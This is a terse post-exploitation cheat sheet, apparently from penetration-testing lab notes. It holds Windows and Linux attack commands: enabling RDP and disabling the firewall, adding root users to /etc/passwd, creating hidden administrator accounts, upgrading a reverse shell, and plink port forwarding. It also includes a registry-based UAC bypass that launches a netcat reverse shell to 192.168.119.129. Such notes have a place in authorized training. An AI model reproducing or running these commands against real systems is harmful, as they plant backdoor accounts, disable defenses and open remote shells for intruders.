RDP
#test on windows 2003
netsh firewall set service type = remotedesktop mode = enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fLinux
python -c 'import pty;pty.spawn("/bin/bash");'
ctrl+^z
stty -a
stty -echo raw
fg
recover
stty rows 26 columns 136
export SHELL=/bin/bash
export TERM=xterm-256colorLinux
echo test:$(mkpasswd -m sha-512 password):0:0:root:/root:/bin/bash >> /etc/passwd
echo user1:$(openssl passwd -6 -salt fdsafdsa password):0:0:root:/root:/bin/bash >> /etc/passwdWindows
#Add admin user and add it into remotedesktop group
net user <username> <password> /add
net localgroup administrators <username> /add
net localgroup "Remote Desktop Users" <username> /addnetsh advfirewall set allprofiles state offdir /A:H
#Using this command under c:\users\ directory
dir /a:h /b /s | findstr /i /v "appdata"
dir /b /s | findstr /i /v "appdata"#Assign value to "HKCU\Software\Classes\ms-settings\shell\open\command"
reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "nc.exe -e cmd.exe 192.168.119.129 443" /f
#Assign value name "DelegateExecute" to key "HKCU\Software\Classes\ms-settings\shell\open\command"
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute"windows remote port forward
plink.exe -ssh -l <username> -pw <passwd> -R <your host>:1234:<target host>:8080 <your host> -P <port>windows
shutdown /r /t 0